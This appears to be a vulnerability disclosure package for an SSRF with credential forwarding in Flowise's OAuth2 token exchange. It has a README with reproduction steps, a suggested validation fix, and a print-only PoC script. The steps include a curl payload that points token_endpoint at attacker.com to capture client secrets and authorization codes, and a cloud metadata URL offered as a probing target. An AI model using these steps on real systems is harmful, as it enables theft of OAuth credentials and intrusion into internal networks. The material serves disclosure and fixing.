PoC: Flowise — OAuth2 credential-forwarding SSRF

README.md

@@ -0,0 +1,135 @@
+# Flowise OAuth2 Credential-Forwarding SSRF via User-Controlled token_endpoint
+
+## Vulnerability Type
+CWE-918: Server-Side Request Forgery (SSRF) with Credential Forwarding
+
+## Severity
+High — Authenticated users can exfiltrate OAuth2 client secrets and authorization codes
+
+## Affected Component
+- **File:** `packages/server/src/routes/oauth2/index.ts`
+- **Lines:** 213-240 (token exchange), 336-355 (token refresh)
+- **Version:** Latest main branch (verified 2026-03-21)
+
+## Description
+
+The Flowise OAuth2 authorization code flow allows authenticated users (with `credentials:create` permission) to configure custom OAuth2 providers by setting `token_endpoint` and `authorization_endpoint` in credential data. The `token_endpoint` URL is used without validation to exchange authorization codes for access tokens.
+
+An attacker can create a credential with `token_endpoint` pointing to an attacker-controlled server. When the OAuth2 callback fires, Flowise sends a POST request to the attacker's server containing:
+- `client_id`
+- `client_secret`
+- `authorization_code`
+- `redirect_uri`
+- `scope`
+
+## Steps to Reproduce
+
+### 1. Create malicious OAuth2 credential
+
+As any authenticated Flowise user with `credentials:create` permission:
+
+```bash
+curl -X POST http://flowise:3000/api/v1/credentials \
+  -H "Authorization: Bearer <user_token>" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "name": "Malicious OAuth",
+    "credentialName": "oAuth2Api",
+    "encryptedData": {
+      "client_id": "legitimate-app-id",
+      "client_secret": "legitimate-secret",
+      "token_endpoint": "https://attacker.com/steal-token",
+      "authorization_endpoint": "https://accounts.google.com/o/oauth2/v2/auth",
+      "scope": "openid email profile"
+    }
+  }'
+```
+
+### 2. Initiate OAuth2 flow
+
+```bash
+curl -X POST http://flowise:3000/api/v1/oauth2/authorize/<credential_id>
+# Returns authorization URL — user authenticates normally with Google/Microsoft
+```
+
+### 3. Callback sends credentials to attacker
+
+When the OAuth2 callback fires at `/api/v1/oauth2/callback`, the server executes:
+
+```typescript
+// Line 213-240 in oauth2/index.ts
+let tokenUrl = accessTokenUrl  // from credential's token_endpoint field
+const tokenResponse = await axios.post(tokenUrl,
+  new URLSearchParams(tokenRequestData).toString(), {
+    headers: {
+      'Content-Type': 'application/x-www-form-urlencoded',
+      Accept: 'application/json'
+    }
+  })
+```
+
+The attacker's server at `https://attacker.com/steal-token` receives:
+```
+client_id=legitimate-app-id&
+client_secret=legitimate-secret&
+code=4/0AX4XfWh...&
+grant_type=authorization_code&
+redirect_uri=http://flowise:3000/api/v1/oauth2/callback
+```
+
+### 4. Token refresh also affected
+
+The same pattern exists in the token refresh flow (lines 336-355):
+```typescript
+let tokenUrl = accessTokenUrl  // same user-controlled field
+const tokenResponse = await axios.post(tokenUrl,
+  new URLSearchParams(refreshRequestData).toString(), ...)
+```
+
+## Impact
+
+1. **Client secret theft** — attacker receives the OAuth2 `client_secret` which may grant long-term API access
+2. **Authorization code theft** — attacker receives the one-time `code` which can be exchanged for access tokens at the real provider
+3. **Session hijacking** — if the attacker responds with a valid-looking token, Flowise stores it in the credential, giving the attacker control over what token is used
+4. **Internal network scanning** — by setting `token_endpoint` to internal URLs (e.g., `http://169.254.169.254/latest/meta-data/`), the attacker can probe internal infrastructure
+
+## Root Cause
+
+The `token_endpoint` URL from credential configuration is used directly in `axios.post()` without:
+1. URL validation (no check for internal IPs, private ranges)
+2. Domain allowlisting (no restriction on where tokens are sent)
+3. Protocol enforcement (no HTTPS requirement)
+
+## Suggested Fix
+
+Validate the `token_endpoint` URL before making requests:
+
+```typescript
+import { URL } from 'url';
+import { isPrivateIP } from '../utils/networking';
+
+function validateTokenUrl(urlString: string): void {
+  const url = new URL(urlString);
+
+  // Require HTTPS
+  if (url.protocol !== 'https:') {
+    throw new Error('Token endpoint must use HTTPS');
+  }
+
+  // Block private IPs
+  if (isPrivateIP(url.hostname)) {
+    throw new Error('Token endpoint cannot point to private IP');
+  }
+
+  // Optional: allowlist known OAuth providers
+  const ALLOWED_HOSTS = [
+    'login.microsoftonline.com',
+    'accounts.google.com',
+    'oauth2.googleapis.com',
+    'github.com',
+  ];
+  if (!ALLOWED_HOSTS.some(h => url.hostname.endsWith(h))) {
+    logger.warn(`Non-standard OAuth token endpoint: ${url.hostname}`);
+  }
+}
+```

poc.py

@@ -0,0 +1,13 @@
+"""Flowise — OAuth2 credential-forwarding SSRF PoC
+
+Any authenticated user with credentials:create permission can set
+token_endpoint to an attacker server, receiving client_id + client_secret.
+
+Affected: packages/server/src/routes/oauth2/index.ts:240
+"""
+print("Attack chain:")
+print("1. POST /api/v1/credentials — create OAuth2 credential with:")
+print("   token_endpoint: https://attacker.com/steal")
+print("2. POST /api/v1/oauth2/authorize/<credential_id>")
+print("3. User completes OAuth flow")
+print("4. Callback POSTs client_id + client_secret + auth_code to attacker.com")